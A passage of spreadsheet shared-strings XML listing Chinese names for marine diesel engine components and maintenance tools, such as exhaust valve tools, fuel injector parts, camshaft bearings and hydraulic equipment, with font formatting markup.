        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流动清洗单向阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀挡环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压拉伸器组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管研磨工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切割工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工具转换设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀测试设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀打开工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀桥规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸液压单元基板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵筒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>续压器测试设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气控制块工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器缝隙式滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带活塞的缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷嘴组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球放气螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触针</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器测试器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气阀测试装备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀和示功阀布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油控制布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导筒轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆安全锁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶杆导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴板接头说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套颈部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵排气阀驱动器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导套提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套提升六角板手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套机械起重机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油和排气阀弹簧压缩工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动轴安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压油进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压油出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压液压油出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防溅罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵站</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压供应系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带漏斗的管子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带刹车盘的毂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧挡板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺母的滑动套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧板和轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带链轮的轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推轴承减振</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惰轮组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急换向机械拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动链液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阶力矩补偿器用销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动研磨机支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反转曲柄铣削工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轮组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>远程压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承监控</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖泄放检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转化器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油仪表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温器箱安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒压阀支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度触头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器液位指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
